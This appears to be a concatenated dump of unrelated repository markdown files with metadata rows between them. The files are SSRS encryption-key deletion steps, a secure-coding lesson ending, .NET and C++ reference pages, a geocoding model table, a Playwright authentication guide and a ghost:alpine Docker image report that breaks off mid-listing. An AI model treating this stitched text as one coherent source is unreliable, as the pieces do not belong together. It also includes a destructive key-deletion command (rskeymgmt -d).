If for some reason you cannot restore the encryption key, the report server will never be able to decrypt and use any data that is encrypted with that key. To return the report server to a working state, you must delete the encrypted values that are currently stored in the report server database and then manually re-specify the values you need.
Deleting the encryption keys removes all symmetric key information from the report server database and deletes any encrypted content. All unencrypted data is left intact; only encrypted content is removed. When you delete the encryption keys, the report server re-initializes itself automatically by adding a new symmetric key. The following occurs when you delete encrypted content:
- Connection strings in shared data sources are deleted. Users who run reports get the error "The ConnectionString property has not been initialized."
- Stored credentials are deleted. Reports and shared data sources are reconfigured to use prompted credentials.
- Reports that are based on models (and require shared data sources configured with stored or no credentials) will not run.
- Subscriptions are deactivated.
Once you delete encrypted content, you cannot recover it. You must re-specify connection strings and stored credentials, and you must activate subscriptions.
You can use the Reporting Services Configuration tool or the **rskeymgmt** utility to remove the values.
### How to delete encryption keys (Reporting Services Configuration Tool)
1. Start the Reporting Services Configuration tool, and then connect to the report server instance you want to configure.
2. Click **Encryption Keys**, and then click **Delete**. [!INCLUDE[clickOK](../../includes/clickok-md.md)]
3. Restart the Report Server Windows service. For a scale-out deployment, do this on all report server instances.
### How to delete encryption keys (rskeymgmt)
1. Run **rskeymgmt.exe** locally on the computer that hosts the report server. You must use the **-d** argument. The following example illustrates the argument you must specify:
```
rskeymgmt -d
```
2. Restart the Report Server Windows service. For a scale-out deployment, do this on all report server instances.
### How to re-specify encrypted values
1. For each shared data source, you must retype the connection string.
2. For each report and shared data source that uses stored credentials, you must retype the user name and password, and then save. For more information, see [Specify Credential and Connection Information for Report Data Sources](../../reporting-services/report-data/specify-credential-and-connection-information-for-report-data-sources.md).
3. For each data-driven subscription, open each subscription and retype the credentials to the subscription database.
4. For subscriptions that use encrypted data (this includes the File Share delivery extension and any third-party delivery extension that uses encryption), open each subscription and retype credentials. Subscriptions that use Report Server e-mail delivery do not use encrypted data and are unaffected by the key change.
## See Also
[Configure and Manage Encryption Keys (SSRS Configuration Manager)](../../reporting-services/install-windows/ssrs-encryption-keys-manage-encryption-keys.md)
[Store Encrypted Report Server Data (SSRS Configuration Manager)](../../reporting-services/install-windows/ssrs-encryption-keys-store-encrypted-report-server-data.md)
| 73.435897 | 573 | 0.760824 | eng_Latn | 0.996616 |
61b85022665995c8ffd16d66754ba8afa99b5a45 | 401 | md | Markdown | hunter2-lessons/power-of-none/content/step8.md | ekmixon/appsec-education | e8b50f63ee9c62a2bb9a0944f83a2b636939ffd5 | [
"BSD-3-Clause"
] | 56 | 2019-10-28T15:50:38.000Z | 2022-03-31T18:40:05.000Z | hunter2-lessons/power-of-none/content/step8.md | misfir3/appsec-education | e6f90fb88e7a2c439e21405526dfaff554c1750e | [
"BSD-3-Clause"
] | 76 | 2021-05-14T23:58:34.000Z | 2022-03-29T22:33:46.000Z | hunter2-lessons/power-of-none/content/step8.md | misfir3/appsec-education | e6f90fb88e7a2c439e21405526dfaff554c1750e | [
"BSD-3-Clause"
] | 13 | 2019-11-19T11:31:27.000Z | 2021-05-17T12:27:03.000Z | ## Complete!
With these new checks in place, we're assured that the two values, `input1` and `input2`, are strings that can be correctly compared. While there are other ways to correct the issue with the `code` value handling, this fix spotlights the need for good input validation at both the user-submission and method levels.
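A minimal sketch of the kind of check this lesson adds, written in Python; the function and variable names here are illustrative stand-ins, not the application's actual code:

```python
def compare_codes(input1, input2):
    # Reject anything that is not a string (e.g. None) before comparing,
    # so a missing `code` value can never "match" another missing value.
    if not isinstance(input1, str) or not isinstance(input2, str):
        return False
    return input1 == input2

print(compare_codes("s3cret", "s3cret"))  # True
print(compare_codes(None, None))          # False: two missing values no longer match
```

The type check runs before the comparison, so every code path that reaches `==` is guaranteed to be comparing two strings.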
You have completed this lesson and will now receive credit.
| 66.833333 | 325 | 0.785536 | eng_Latn | 0.99994 |
61b91442da5bfc3b0266b71fa672750a826cc187 | 1,468 | md | Markdown | docs/framework/unmanaged-api/hosting/icorruntimehost-mapfile-method.md | juucustodio/docs.pt-br | a3c389ac92d6e3c69928c7b906e48fbb308dc41f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/unmanaged-api/hosting/icorruntimehost-mapfile-method.md | juucustodio/docs.pt-br | a3c389ac92d6e3c69928c7b906e48fbb308dc41f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/unmanaged-api/hosting/icorruntimehost-mapfile-method.md | juucustodio/docs.pt-br | a3c389ac92d6e3c69928c7b906e48fbb308dc41f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: ICorRuntimeHost::MapFile Method
ms.date: 03/30/2017
api_name:
- ICorRuntimeHost.MapFile
api_location:
- mscoree.dll
api_type:
- COM
f1_keywords:
- ICorRuntimeHost::MapFile
helpviewer_keywords:
- ICorRuntimeHost::MapFile method [.NET Framework hosting]
- MapFile method [.NET Framework hosting]
ms.assetid: 45ae0502-0a31-4342-b7e3-f36e1cf738f3
topic_type:
- apiref
ms.openlocfilehash: 3b1a0cd9a1dfba6f33a20416f2a10c967f871a06
ms.sourcegitcommit: c76c8b2c39ed2f0eee422b61a2ab4c05ca7771fa
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 05/21/2020
ms.locfileid: "83762663"
---
# <a name="icorruntimehostmapfile-method"></a>ICorRuntimeHost::MapFile Method

Maps the specified file into memory. This method is obsolete.

## <a name="syntax"></a>Syntax
```cpp
HRESULT MapFile(
[in] HANDLE hFile,
[out] HMODULE* hMapAddress
);
```
## <a name="parameters"></a>Parameters

`hFile`
[in] The handle of the file to be mapped.

`hMapAddress`
[out] The starting memory address at which to begin mapping the file.

## <a name="requirements"></a>Requirements

**Platforms:** See [System Requirements](../../get-started/system-requirements.md).

**Header:** MSCorEE.h

**Library:** Included as a resource in MSCorEE.dll

**.NET Framework Versions:** 1.0, 1.1

## <a name="see-also"></a>See also

- [ICorRuntimeHost Interface](icorruntimehost-interface.md)
| 26.214286 | 94 | 0.724114 | por_Latn | 0.316177 |
61b925c8533a0f2f58ce7d3d6f68571199c41d87 | 1,479 | md | Markdown | docs/error-messages/compiler-errors-2/compiler-error-c3056.md | OpenLocalizationTestOrg/cpp-docs.pt-br | 8db634f3c761bd342bf650a6794e72189b199c9f | [
"CC-BY-4.0"
] | null | null | null | docs/error-messages/compiler-errors-2/compiler-error-c3056.md | OpenLocalizationTestOrg/cpp-docs.pt-br | 8db634f3c761bd342bf650a6794e72189b199c9f | [
"CC-BY-4.0"
] | null | null | null | docs/error-messages/compiler-errors-2/compiler-error-c3056.md | OpenLocalizationTestOrg/cpp-docs.pt-br | 8db634f3c761bd342bf650a6794e72189b199c9f | [
"CC-BY-4.0"
] | null | null | null | ---
title: Compiler Error C3056 | Microsoft Docs
ms.custom:
ms.date: 11/04/2016
ms.reviewer:
ms.suite:
ms.technology:
- devlang-csharp
ms.tgt_pltfrm:
ms.topic: article
f1_keywords:
- C3056
dev_langs:
- C++
helpviewer_keywords:
- C3056
ms.assetid: 9500173d-870b-49b3-8e88-0ee93586d19a
caps.latest.revision: 7
author: corob-msft
ms.author: corob
manager: ghogen
translation.priority.ht:
- de-de
- es-es
- fr-fr
- it-it
- ja-jp
- ko-kr
- ru-ru
- zh-cn
- zh-tw
translation.priority.mt:
- cs-cz
- pl-pl
- pt-br
- tr-tr
translationtype: Machine Translation
ms.sourcegitcommit: 3168772cbb7e8127523bc2fc2da5cc9b4f59beb8
ms.openlocfilehash: b3d8f49c518921bc41c5adf568d9fcdf1a190344
---
# Compiler Error C3056
'symbol' : symbol is not in the same scope with 'threadprivate' directive
A symbol used in a [threadprivate](../../parallel/openmp/reference/threadprivate.md) clause must be in the same scope as the `threadprivate` clause.
The following sample generates C3056:
```
// C3056.cpp
// compile with: /openmp
int x, y;
void test() {
#pragma omp threadprivate(x, y) // C3056
#pragma omp parallel copyin(x, y)
{
x = y;
}
}
```
Possible resolution:
```
// C3056b.cpp
// compile with: /openmp /LD
int x, y;
#pragma omp threadprivate(x, y)
void test() {
#pragma omp parallel copyin(x, y)
{
x = y;
}
}
```
| 18.259259 | 151 | 0.649763 | eng_Latn | 0.377425 |
61b965a56bb5744b707b5e5968be8a9c79b1a270 | 873 | md | Markdown | docs/GeocodeAddress.md | Syncsort/PreciselyAPIsSDK-Android | 752d575414ca06f04c1499c86a5cc569c5043437 | [
"Apache-2.0"
] | null | null | null | docs/GeocodeAddress.md | Syncsort/PreciselyAPIsSDK-Android | 752d575414ca06f04c1499c86a5cc569c5043437 | [
"Apache-2.0"
] | null | null | null | docs/GeocodeAddress.md | Syncsort/PreciselyAPIsSDK-Android | 752d575414ca06f04c1499c86a5cc569c5043437 | [
"Apache-2.0"
] | null | null | null |
# GeocodeAddress
## Properties
Name | Type | Description | Notes
------------ | ------------- | ------------- | -------------
**objectId** | **String** | | [optional]
**mainAddressLine** | **String** | | [optional]
**addressLastLine** | **String** | | [optional]
**placeName** | **String** | | [optional]
**areaName1** | **String** | | [optional]
**areaName2** | **String** | | [optional]
**areaName3** | **String** | | [optional]
**areaName4** | **String** | | [optional]
**postCode1** | **String** | | [optional]
**postCode2** | **String** | | [optional]
**country** | **String** | | [optional]
**addressNumber** | **String** | | [optional]
**streetName** | **String** | | [optional]
**unitType** | **String** | | [optional]
**unitValue** | **String** | | [optional]
**customFields** | **Map<String, Object>** | | [optional]
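For illustration, a hypothetical instance serialized as JSON; every value below is invented, and all of the properties are optional:

```json
{
  "objectId": "12345",
  "mainAddressLine": "100 Main St",
  "addressLastLine": "Springfield, VA 22150",
  "areaName1": "VA",
  "areaName3": "Springfield",
  "postCode1": "22150",
  "country": "USA",
  "addressNumber": "100",
  "streetName": "Main St",
  "customFields": {}
}
```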
| 30.103448 | 65 | 0.509737 | yue_Hant | 0.582505 |
61b9841af1fc1dd385cf913d8609403531e8540e | 11,357 | md | Markdown | python/docs/auth.md | dgozman/playwright.dev | e3ffd8f43710574497822430c09fe596c0cb243f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | python/docs/auth.md | dgozman/playwright.dev | e3ffd8f43710574497822430c09fe596c0cb243f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | python/docs/auth.md | dgozman/playwright.dev | e3ffd8f43710574497822430c09fe596c0cb243f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
id: auth
title: "Authentication"
---
Playwright can be used to automate scenarios that require authentication.
Tests written with Playwright execute in isolated clean-slate environments called [browser contexts](./core-concepts.md#browser-contexts). This isolation model improves reproducibility and prevents cascading test failures. New browser contexts can load existing authentication state. This eliminates the need to login in every context and speeds up test execution.
> Note: This guide covers cookie/token-based authentication (logging in via the app UI). For [HTTP authentication](https://developer.mozilla.org/en-US/docs/Web/HTTP/Authentication) use [browser.new_context(**options)](./api/class-browser.md#browsernew_contextoptions).
- [Automate logging in](#automate-logging-in)
- [Reuse authentication state](#reuse-authentication-state)
- [Multi-factor authentication](#multi-factor-authentication)
## Automate logging in
The Playwright API can automate interaction with a login form. See [Input guide](./input.md) for more details.
The following example automates login on GitHub. Once these steps are executed, the browser context will be authenticated.
```py
# async
page = await context.new_page()
await page.goto('https://github.com/login')
# Interact with login form
await page.click('text=Login')
await page.fill('input[name="login"]', USERNAME)
await page.fill('input[name="password"]', PASSWORD)
await page.click('text=Submit')
# Verify app is logged in
```
```py
# sync
page = context.new_page()
page.goto('https://github.com/login')
# Interact with login form
page.click('text=Login')
page.fill('input[name="login"]', USERNAME)
page.fill('input[name="password"]', PASSWORD)
page.click('text=Submit')
# Verify app is logged in
```
These steps can be executed for every browser context. However, redoing login for every test can slow down test execution. To prevent that, we will reuse existing authentication state in new browser contexts.
## Reuse authentication state
Web apps use cookie-based or token-based authentication, where authenticated state is stored as [cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) or in [local storage](https://developer.mozilla.org/en-US/docs/Web/API/Storage). Playwright provides [browser_context.storage_state(**options)](./api/class-browsercontext.md#browser_contextstorage_stateoptions) method that can be used to retrieve storage state from authenticated contexts and then create new contexts with prepopulated state.
Cookies and local storage state can be used across different browsers. They depend on your application's authentication model: some apps might require both cookies and local storage.
The following code snippet retrieves state from an authenticated context and creates a new context with that state.
```py
# async
import json
import os
# Save storage state and store as an env variable
storage = await context.storage_state()
os.environ["STORAGE"] = json.dumps(storage)
# Create a new context with the saved storage state
storage_state = json.loads(os.environ["STORAGE"])
context = await browser.new_context(storage_state=storage_state)
```
```py
# sync
import json
import os
# Save storage state and store as an env variable
storage = context.storage_state()
os.environ["STORAGE"] = json.dumps(storage)
# Create a new context with the saved storage state
storage_state = json.loads(os.environ["STORAGE"])
context = browser.new_context(storage_state=storage_state)
```
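If an environment variable is inconvenient (for example, when tests run in separate processes), the same JSON state can be written to disk instead. A stdlib-only sketch of the round-trip, where the `storage` dict stands in for the value returned by `context.storage_state()`:

```python
import json
import os
import tempfile

# Stand-in for the dict returned by context.storage_state()
storage = {"cookies": [], "origins": []}

path = os.path.join(tempfile.mkdtemp(), "state.json")

# Save the state after logging in...
with open(path, "w") as f:
    json.dump(storage, f)

# ...and load it back when creating a new context
with open(path) as f:
    restored = json.load(f)

print(restored == storage)  # True
```

The restored dict can then be passed as `storage_state=restored` to `browser.new_context()`, exactly as with the env-var approach above.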
### Session storage
Session storage ([`window.sessionStorage`](https://developer.mozilla.org/en-US/docs/Web/API/Window/sessionStorage)) is specific to a particular domain. Playwright does not provide API to persist session storage, but the following snippet can be used to save/load session storage.
```py
# async
import os
# Get session storage and store as env variable
session_storage = await page.evaluate("() => JSON.stringify(sessionStorage)")
os.environ["SESSION_STORAGE"] = session_storage
# Set session storage in a new context
session_storage = os.environ["SESSION_STORAGE"]
# The script argument must be a string of JavaScript; embed the saved
# state by wrapping it in an immediately-invoked function.
await context.add_init_script("""(storage => {
  if (window.location.hostname === 'example.com') {
    const entries = JSON.parse(storage)
    Object.keys(entries).forEach(key => {
      window.sessionStorage.setItem(key, entries[key])
    })
  }
})('""" + session_storage + "')")
```
```py
# sync
import os
# Get session storage and store as env variable
session_storage = page.evaluate("() => JSON.stringify(sessionStorage)")
os.environ["SESSION_STORAGE"] = session_storage
# Set session storage in a new context
session_storage = os.environ["SESSION_STORAGE"]
# The script argument must be a string of JavaScript; embed the saved
# state by wrapping it in an immediately-invoked function.
context.add_init_script("""(storage => {
  if (window.location.hostname === 'example.com') {
    const entries = JSON.parse(storage)
    Object.keys(entries).forEach(key => {
      window.sessionStorage.setItem(key, entries[key])
    })
  }
})('""" + session_storage + "')")
```
### Lifecycle
Logging in via the UI and then reusing authentication state can be combined to implement **login once and run multiple scenarios**. The lifecycle looks like:
1. Run tests (for example, with `npm run test`).
1. Login via UI and retrieve authentication state.
* In Jest, this can be executed in [`globalSetup`](https://jestjs.io/docs/en/configuration#globalsetup-string).
1. In each test, load authentication state in `beforeEach` or `beforeAll` step.
This approach will also **work in CI environments**, since it does not rely on any external state.
### Example
[This example script](https://github.com/microsoft/playwright/blob/master/docs/examples/authentication.js) logs in on GitHub.com with Chromium, and then reuses the logged in storage state in WebKit.
### API reference
- [browser_context.storage_state(**options)](./api/class-browsercontext.md#browser_contextstorage_stateoptions)
- [browser.new_context(**options)](./api/class-browser.md#browsernew_contextoptions)
- [page.evaluate(expression, **options)](./api/class-page.md#pageevaluateexpression-options)
- [browser_context.add_init_script(**options)](./api/class-browsercontext.md#browser_contextadd_init_scriptoptions)
## Multi-factor authentication
Accounts with multi-factor authentication (MFA) cannot be fully automated, and need manual intervention. Persistent authentication can be used to partially automate MFA scenarios.
### Persistent authentication
Web browsers use a directory on disk to store user history, cookies, IndexedDB and other local state. This disk location is called the [User data directory](https://chromium.googlesource.com/chromium/src/+/master/docs/user_data_dir.md).
Note that persistent authentication is not suited for CI environments since it relies on a disk location. User data directories are specific to browser types and cannot be shared across browser types.
User data directories can be used with the [browser_type.launch_persistent_context(user_data_dir, **options)](./api/class-browsertype.md#browser_typelaunch_persistent_contextuser_data_dir-options) API.
```py
# async
import asyncio
from playwright.async_api import async_playwright
async def main():
async with async_playwright() as p:
user_data_dir = '/path/to/directory'
        browser = await p.chromium.launch_persistent_context(user_data_dir, headless=False)
# Execute login steps manually in the browser window
asyncio.get_event_loop().run_until_complete(main())
```
```py
# sync
from playwright.sync_api import sync_playwright
with sync_playwright() as p:
user_data_dir = '/path/to/directory'
browser = p.chromium.launch_persistent_context(user_data_dir, headless=False)
# Execute login steps manually in the browser window
```
### Lifecycle
1. Create a user data directory on disk.
2. Launch a persistent context with the user data directory and login the MFA account.
3. Reuse the user data directory to run automation scenarios.
### API reference
- [BrowserContext]
- [browser_type.launch_persistent_context(user_data_dir, **options)](./api/class-browsertype.md#browser_typelaunch_persistent_contextuser_data_dir-options)
[Accessibility]: ./api/class-accessibility.md "Accessibility"
[Browser]: ./api/class-browser.md "Browser"
[BrowserContext]: ./api/class-browsercontext.md "BrowserContext"
[BrowserType]: ./api/class-browsertype.md "BrowserType"
[CDPSession]: ./api/class-cdpsession.md "CDPSession"
[ChromiumBrowserContext]: ./api/class-chromiumbrowsercontext.md "ChromiumBrowserContext"
[ConsoleMessage]: ./api/class-consolemessage.md "ConsoleMessage"
[Dialog]: ./api/class-dialog.md "Dialog"
[Download]: ./api/class-download.md "Download"
[ElementHandle]: ./api/class-elementhandle.md "ElementHandle"
[FileChooser]: ./api/class-filechooser.md "FileChooser"
[Frame]: ./api/class-frame.md "Frame"
[JSHandle]: ./api/class-jshandle.md "JSHandle"
[Keyboard]: ./api/class-keyboard.md "Keyboard"
[Mouse]: ./api/class-mouse.md "Mouse"
[Page]: ./api/class-page.md "Page"
[Playwright]: ./api/class-playwright.md "Playwright"
[Request]: ./api/class-request.md "Request"
[Response]: ./api/class-response.md "Response"
[Route]: ./api/class-route.md "Route"
[Selectors]: ./api/class-selectors.md "Selectors"
[TimeoutError]: ./api/class-timeouterror.md "TimeoutError"
[Touchscreen]: ./api/class-touchscreen.md "Touchscreen"
[Video]: ./api/class-video.md "Video"
[WebSocket]: ./api/class-websocket.md "WebSocket"
[Worker]: ./api/class-worker.md "Worker"
[Element]: https://developer.mozilla.org/en-US/docs/Web/API/element "Element"
[Evaluation Argument]: ./core-concepts.md#evaluationargument "Evaluation Argument"
[Promise]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise "Promise"
[iterator]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Iteration_protocols "Iterator"
[origin]: https://developer.mozilla.org/en-US/docs/Glossary/Origin "Origin"
[selector]: https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Selectors "selector"
[Serializable]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/JSON/stringify#Description "Serializable"
[UIEvent.detail]: https://developer.mozilla.org/en-US/docs/Web/API/UIEvent/detail "UIEvent.detail"
[UnixTime]: https://en.wikipedia.org/wiki/Unix_time "Unix Time"
[xpath]: https://developer.mozilla.org/en-US/docs/Web/XPath "xpath"
[Any]: https://docs.python.org/3/library/typing.html#typing.Any "Any"
[bool]: https://docs.python.org/3/library/stdtypes.html "bool"
[Callable]: https://docs.python.org/3/library/typing.html#typing.Callable "Callable"
[EventContextManager]: https://docs.python.org/3/reference/datamodel.html#context-managers "Event context manager"
[Dict]: https://docs.python.org/3/library/typing.html#typing.Dict "Dict"
[float]: https://docs.python.org/3/library/stdtypes.html#numeric-types-int-float-complex "float"
[int]: https://docs.python.org/3/library/stdtypes.html#numeric-types-int-float-complex "int"
[List]: https://docs.python.org/3/library/typing.html#typing.List "List"
[NoneType]: https://docs.python.org/3/library/constants.html#None "None"
[Pattern]: https://docs.python.org/3/library/re.html "Pattern"
[URL]: https://en.wikipedia.org/wiki/URL "URL"
[pathlib.Path]: https://realpython.com/python-pathlib/ "pathlib.Path"
[str]: https://docs.python.org/3/library/stdtypes.html#text-sequence-type-str "str"
[Union]: https://docs.python.org/3/library/typing.html#typing.Union "Union" | 45.979757 | 507 | 0.77133 | eng_Latn | 0.460357 |
61b987c364d5af448fbb0a68f4cf91a619299323 | 72 | md | Markdown | README.md | Segse/OJSO | a31329d6d9a140f1f3a9ff05b896ea755ffa7872 | [
"MIT"
] | 1 | 2017-09-19T23:04:02.000Z | 2017-09-19T23:04:02.000Z | README.md | Segse/OJSO | a31329d6d9a140f1f3a9ff05b896ea755ffa7872 | [
"MIT"
] | null | null | null | README.md | Segse/OJSO | a31329d6d9a140f1f3a9ff05b896ea755ffa7872 | [
"MIT"
] | null | null | null | # OJSO
Object-oriented JavaScript library - oJSo - JavaScript with ears
| 24 | 64 | 0.791667 | eng_Latn | 0.829452 |
61ba7570994abe5548b6a72ad6da3c6602a827f9 | 62,988 | md | Markdown | repos/ghost/remote/alpine.md | victorvw/repo-info | 9e552baded50c4ec520bca3bb8d5645b17c48c56 | [
"Apache-2.0"
] | null | null | null | repos/ghost/remote/alpine.md | victorvw/repo-info | 9e552baded50c4ec520bca3bb8d5645b17c48c56 | [
"Apache-2.0"
] | null | null | null | repos/ghost/remote/alpine.md | victorvw/repo-info | 9e552baded50c4ec520bca3bb8d5645b17c48c56 | [
"Apache-2.0"
] | null | null | null | ## `ghost:alpine`
```console
$ docker pull ghost@sha256:1bc5473624107cca1b104a30f4306321367d38bceb86b2ed1ffa94386539c2bb
```
- Manifest MIME: `application/vnd.docker.distribution.manifest.list.v2+json`
- Platforms:
- linux; amd64
- linux; arm variant v6
- linux; arm variant v7
- linux; arm64 variant v8
- linux; 386
- linux; ppc64le
- linux; s390x
### `ghost:alpine` - linux; amd64
```console
$ docker pull ghost@sha256:230d19122af4b74857403ee2dad7248a7cbdd90c3af01fec6c28b8f5cf1e4e89
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **109.0 MB (109023264 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:efff227b432c56c211f158921448d6dcbd89f41b6d1da98ead96416012844e9d`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Fri, 24 Apr 2020 01:05:03 GMT
ADD file:b91adb67b670d3a6ff9463e48b7def903ed516be66fc4282d22c53e41512be49 in /
# Fri, 24 Apr 2020 01:05:03 GMT
CMD ["/bin/sh"]
# Tue, 26 May 2020 22:45:00 GMT
ENV NODE_VERSION=12.17.0
# Tue, 26 May 2020 22:45:06 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="fbd8916cc5a3c85dc503cc1fe9606cf8860152c4e8b2f2fcc729e48db3e3d654" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" 
&& ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Tue, 26 May 2020 22:45:06 GMT
ENV YARN_VERSION=1.22.4
# Tue, 26 May 2020 22:45:08 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Tue, 26 May 2020 22:45:08 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Tue, 26 May 2020 22:45:09 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 22:45:09 GMT
CMD ["node"]
# Tue, 26 May 2020 23:08:26 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Tue, 26 May 2020 23:08:28 GMT
RUN apk add --no-cache bash
# Tue, 26 May 2020 23:08:29 GMT
ENV NODE_ENV=production
# Tue, 26 May 2020 23:08:29 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Tue, 26 May 2020 23:08:57 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Tue, 26 May 2020 23:08:57 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Tue, 26 May 2020 23:08:58 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Tue, 26 May 2020 23:08:58 GMT
ENV GHOST_VERSION=3.17.1
# Tue, 26 May 2020 23:10:22 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Tue, 26 May 2020 23:10:24 GMT
WORKDIR /var/lib/ghost
# Tue, 26 May 2020 23:10:24 GMT
VOLUME [/var/lib/ghost/content]
# Tue, 26 May 2020 23:10:25 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Tue, 26 May 2020 23:10:25 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 23:10:26 GMT
EXPOSE 2368
# Tue, 26 May 2020 23:10:26 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:cbdbe7a5bc2a134ca8ec91be58565ec07d037386d1f1d8385412d224deafca08`
Last Modified: Thu, 23 Apr 2020 14:07:19 GMT
Size: 2.8 MB (2813316 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f2258f794beb1f503eb2951ce0825088dfaf1b1351cec61d423a9d36e6074ced`
Last Modified: Tue, 26 May 2020 22:48:30 GMT
Size: 24.7 MB (24740785 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:15bb2c1711f4234fb4ece973e4c6a76c536ea07629e4e1fe72d6e5f9def0100e`
Last Modified: Tue, 26 May 2020 22:48:23 GMT
